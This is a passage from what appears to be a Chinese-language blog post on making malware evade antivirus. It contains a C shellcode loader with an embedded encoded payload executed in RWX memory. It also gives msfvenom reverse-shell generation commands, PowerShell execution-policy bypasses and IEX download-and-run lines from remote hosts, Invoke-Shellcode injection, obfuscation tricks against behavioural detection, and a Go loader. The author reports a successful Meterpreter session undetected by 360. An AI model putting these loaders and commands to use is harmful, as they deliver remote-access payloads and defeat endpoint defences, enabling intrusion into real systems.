64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};
/* Returns the buffer size Base64decode() needs for `bufcoded`: the decoded
 * byte count (rounded up to whole 4-character groups) plus one for the NUL
 * terminator the decoder appends. Scans until the first non-alphabet byte,
 * so the input must be NUL-terminated (or end in '=' padding). */
int Base64decode_len(const char* bufcoded)
{
    const unsigned char* cursor = (const unsigned char*)bufcoded;
    int nprbytes = 0;

    /* pr2six maps every non-alphabet byte, including NUL and '=', to 64. */
    while (pr2six[*cursor] <= 63) {
        cursor++;
        nprbytes++;
    }

    /* 4 input characters (a partial group rounds up) decode to 3 bytes. */
    int nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    return nbytesdecoded + 1;
}
/* Decodes the leading base64 run of `bufcoded` into `bufplain` and
 * NUL-terminates it. Decoding stops at the first byte that is not in the
 * alphabet ('=' padding, NUL, whitespace, ...). Returns the number of
 * decoded bytes, excluding the terminator.
 *
 * Nothing here bounds the writes by the destination's capacity: `bufplain`
 * must provide at least Base64decode_len(bufcoded) bytes. */
int Base64decode(char* bufplain, const char* bufcoded)
{
    const unsigned char* in = (const unsigned char*)bufcoded;
    unsigned char* out = (unsigned char*)bufplain;

    /* Length of the leading alphabet run; pr2six yields 64 for any stop byte. */
    int nprbytes = 0;
    while (pr2six[in[nprbytes]] <= 63) {
        nprbytes++;
    }
    /* Output estimate: 3 bytes per group of 4, partial group rounded up. */
    int nbytesdecoded = ((nprbytes + 3) / 4) * 3;

    /* All groups except the last are complete; the last one is left to the
     * tail below because, without '=' padding, it may hold only 2 or 3 chars. */
    for (; nprbytes > 4; nprbytes -= 4, in += 4) {
        *out++ = (unsigned char)(pr2six[in[0]] << 2 | pr2six[in[1]] >> 4);
        *out++ = (unsigned char)(pr2six[in[1]] << 4 | pr2six[in[2]] >> 2);
        *out++ = (unsigned char)(pr2six[in[2]] << 6 | pr2six[in[3]]);
    }

    /* Tail: 2 characters give 1 byte, 3 give 2, 4 give 3. A lone trailing
     * character cannot form a whole byte and is silently ignored. */
    if (nprbytes > 1) {
        *out++ = (unsigned char)(pr2six[in[0]] << 2 | pr2six[in[1]] >> 4);
    }
    if (nprbytes > 2) {
        *out++ = (unsigned char)(pr2six[in[1]] << 4 | pr2six[in[2]] >> 2);
    }
    if (nprbytes > 3) {
        *out++ = (unsigned char)(pr2six[in[2]] << 6 | pr2six[in[3]]);
    }
    *out = '\0';

    /* Drop the bytes the rounded-up estimate assumed for missing characters. */
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
}
/* Forward alphabet: index 0..63 -> the standard base64 character, in the
 * same order pr2six maps back (upper, lower, digits, '+', '/'). */
static const char basis_64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789+/";
/* Returns the buffer size Base64encode() needs for `len` input bytes: four
 * characters per full or partial 3-byte group, plus one for the NUL the
 * encoder appends. Because this file's encoder omits '=' padding, the value
 * is an upper bound when `len` is not a multiple of 3. */
int Base64encode_len(int len)
{
    int groups = (len + 2) / 3;
    return 4 * groups + 1;
}
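/* Encodes `len` bytes of `string` into `encoded` as base64 WITHOUT '='
 * padding (deliberately, see the tail), appends a NUL and returns the number
 * of characters written including that NUL. `encoded` must provide at least
 * Base64encode_len(len) bytes; the writes are not bounded by its capacity.
 *
 * Fix over the original: the input is read through `unsigned char`. With a
 * signed `char`, `string[i] >> 2` on a byte >= 0x80 right-shifts a negative
 * value, which is implementation-defined in C; unsigned arithmetic makes the
 * six-bit extraction well-defined on every compiler. */
int Base64encode(char* encoded, const char* string, int len)
{
    const unsigned char* in = (const unsigned char*)string;
    char* p = encoded;
    int i;

    /* Full 3-byte groups -> 4 characters each. */
    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[in[i] >> 2];
        *p++ = basis_64[((in[i] & 0x3) << 4) | (in[i + 1] >> 4)];
        *p++ = basis_64[((in[i + 1] & 0xF) << 2) | (in[i + 2] >> 6)];
        *p++ = basis_64[in[i + 2] & 0x3F];
    }

    /* Trailing 1 or 2 bytes -> 2 or 3 characters. */
    if (i < len) {
        *p++ = basis_64[in[i] >> 2];
        if (i == len - 1) {
            *p++ = basis_64[(in[i] & 0x3) << 4];
        } else {
            *p++ = basis_64[((in[i] & 0x3) << 4) | (in[i + 1] >> 4)];
            *p++ = basis_64[(in[i + 1] & 0xF) << 2];
        }
        /* No '=' padding is emitted here; Base64decode() in this file copes
         * because it stops at any non-alphabet byte, including the NUL. */
    }

    *p++ = '\0';
    return p - encoded;
}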

base64.h

#ifndef _BASE64_H_
#define _BASE64_H_
/* NOTE(review): an identifier starting with an underscore followed by an
 * upper-case letter is reserved for the implementation; a guard such as
 * BASE64_H avoids the clash. */
#ifdef __cplusplus
extern "C" {
#endif
/* Buffer size Base64encode() needs for `len` input bytes, including the
 * trailing NUL. */
int Base64encode_len(int len);
/* Encodes len_plain_src bytes of plain_src into coded_dst and NUL-terminates
 * it; returns the number of characters written, NUL included. This
 * implementation emits no '=' padding. coded_dst must hold at least
 * Base64encode_len(len_plain_src) bytes - the encoder does not bound its writes. */
int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src);
/* Buffer size Base64decode() needs for coded_src, including the trailing NUL. */
int Base64decode_len(const char* coded_src);
/* Decodes the leading base64 run of coded_src (stops at the first byte outside
 * the alphabet, e.g. '=' or NUL) into plain_dst and NUL-terminates it; returns
 * the decoded byte count, NUL excluded. plain_dst must hold at least
 * Base64decode_len(coded_src) bytes - the decoder does not bound its writes. */
int Base64decode(char* plain_dst, const char* coded_src);
#ifdef __cplusplus
}
#endif

#endif //_BASE64_H_

shellcode.c

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#include "base64.h"
unsigned char buf[] =
"\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x64\x4a"
"\x6b\x69\x31\x49\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33"
"\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x4d\x63\x43\x73\x50"
"\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a"
"\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48"
"\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x30"
"\x67\x59\x69\x31\x67\x67\x55\x41\x48\x54\x68\x63\x6c\x30\x50"
"\x45\x6b\x78\x2f\x34\x73\x30\x69\x77\x48\x57\x4d\x63\x44\x42"
"\x7a\x77\x32\x73\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33"
"\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64"
"\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42"
"\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a"
"\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44"
"\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33"
"\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f"
"\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f"
"\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x77\x4b\x6a"
"\x64\x67\x47\x67\x43\x41\x42\x46\x63\x69\x65\x5a\x51\x55\x46"
"\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f"
"\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68"
"\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a"
"\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32"
"\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e"
"\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71"
"\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f"
"\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59"
"\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61"
"\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f"
"\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51"
"\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77"
"\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56"
"\x6d\x6f\x41\x55\x2f\x2f\x56";
/* Entry point: base64-decodes the global `buf` into a fixed 1000-byte stack
 * buffer, then copies all 1000 bytes (not just the decoded length) into a
 * PAGE_EXECUTE_READWRITE region and calls it. Base64decode() does not check
 * the destination size, so the program depends on the decoded data fitting
 * in str1. argc and argv are unused. */
int main(int argc, const char* argv[]) {
char str1[1000] = { 0 };
Base64decode(str1, buf);
//printf("%d ", sizeof(str3));
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(Memory, str1, sizeof(str1));
((void(*)())Memory)();
return 0;
}

编译生成exe

image-20220221183846130

msf上线

image-20220221183828731

360动态静态均未查杀

C#

方法

  1. C#源码+shellcode直接编译
  2. 使用加载器加载C#代码,白名单程序加载,比如csc.exe

PS:由于win7环境问题,Vs2019编译出来的exe无法执行,后续调整后再补上 。但是思路和C/C++大同小异:用脚本对C#格式的shellcode进行加密编译生成exe;用ShellcodeWrapper加密生成的C#代码编译生成exe;

Python

方法

  1. python编译shellcode(python+C,base64编码,xor加密,AES加密)
  2. python加载器

环境问题,待补

Powershell

基础知识

常见执行方式

  1. 网络环境直接执行代码,可以加载远程脚本
  2. 本地执行,需要把ps1脚本下载到本地执行

执行策略

查看执行策略powershell Get-ExecutionPolicy

image-20220221215731524

六种执行策略:

Unrestricted 权限最高,可以不受限制执行任意脚本

Restricted 默认策略,不允许任意脚本的执行

AllSigned 所有脚本必须经过签名运行

RemoteSigned 本地脚本无限制,但是对来自网络的脚本必须经过签名

Bypass 没有任何限制和提示

Undefined 没有设置脚本的策略

默认情况下是禁止脚本执行的,管理员可以通过powershell Set-ExecutionPolicy Unrestricted设置执行策略

绕过执行策略的方法:

  • 本地读取后通过管道符运行

    powershell Get-Content 1.ps1 | powershell -NoProfile -
  • 远程下载并通过IEX运行脚本

    powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://[your id]/ps/a.ps1')"
  • Bypass执行策略

    powershell -ExecutionPolicy bypass -File ./a.ps1
  • Unrestricted执行策略标志

    powershell -ExecutionPolicy unrestricted -File ./a.ps1

ps1本地执行

msfvenom -p windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 10 -b '\x00' lhost=192.168.221.128 lport=4444 -f psh -o shell.ps1

把生成的ps1脚本放到win7本地执行

powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1

image-20220222090528846

360动静态都可查杀

PS:msf编码次数过多容易报错,但是少了容易被查杀,都是有可能的

Invoke-Shellcode加载

Powersploit是一款基于powershell的渗透框架

Invoke-Shellcode可以将 shellcode 注入您选择的进程 ID 或本地 PowerShell 中

利用流程如下:

  1. IEX远程下载Invoke-Shellcode.ps1或者在Kali上安装搭建powersploit用于下载脚本
  2. msf生成powershell脚本并监听
  3. IEX远程下载msf脚本
  4. 用Invoke-Shellcode运行脚本
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")

IEX(New-Object Net.WebClient).DownloadString("http://IP/shell.ps1")

Invoke-Shellcode -Shellcode ($buf) -Force

Invoke-Obfuscation

Invoke-Obfuscation是一个用来对powershell脚本编码免杀的工具,之前在做内网渗透靶场的时候用到过,具体使用可见另一篇博客

生成powershell马

msfvenom -p windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.221.128 lport=4444 -f psh -o shell.ps1

运行Invoke-Obfuscation

image-20220222101901109

设置好脚本路径,设置编码方式,编码完成后输出脚本文件即可

免杀效果不如之前了,换了好几种编码方式都被杀了

ps1行为免杀

powershell执行远程下载或者执行shellcode容易触发行为检测

可以尝试对DownloadString、http等敏感词进行替换拼接,如

powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://ip/shell.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

经测试replace也会被行为检测,但这作为思路保留也还是可以尝试其他方法

小结

Powershell的行为被盯得比较紧,最好还是与其他免杀方法结合来使用,直接用powershell执行大概率会被问询

Go

方法

  1. 将shellcode嵌入go代码编译成exe
  2. 使用go的加载器

golang编译shellcode脚本网上可以找找,思路和上面几种语言一样就不测试了

go-shellcode加载器

git clone https://github.com/brimstone/go-shellcode
cd go-shellcode/cmd/sc
go build

生成HEX格式shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o shell.hex LHOST=192.168.221.128 LPORT=4444

在linux或者windows里编译都行,直接sc shellcodesc.exe shellcode执行

image-20220222112803643

360对sc并没有查杀,执行也没有查杀,但是msf收不到meterpreter一直挂,目前没有解决

Ruby

ruby加载shellcode

没有找到ruby的加载器,操作详见链接,win7上没有ruby环境,在实际场景中目标服务器有ruby可以尝试使用,还是比较冷门的,工具中用ruby编译的也比较少

总结

通过各种语言结合编码混淆的方式对shellcode进行自编译,免杀效果比工具篇中直接用工具进行免杀的效果更好,学习测试过程中还是存在不少问题没有解决和理解,还是需要更多的使用经验和积累

空的部分先挖个坑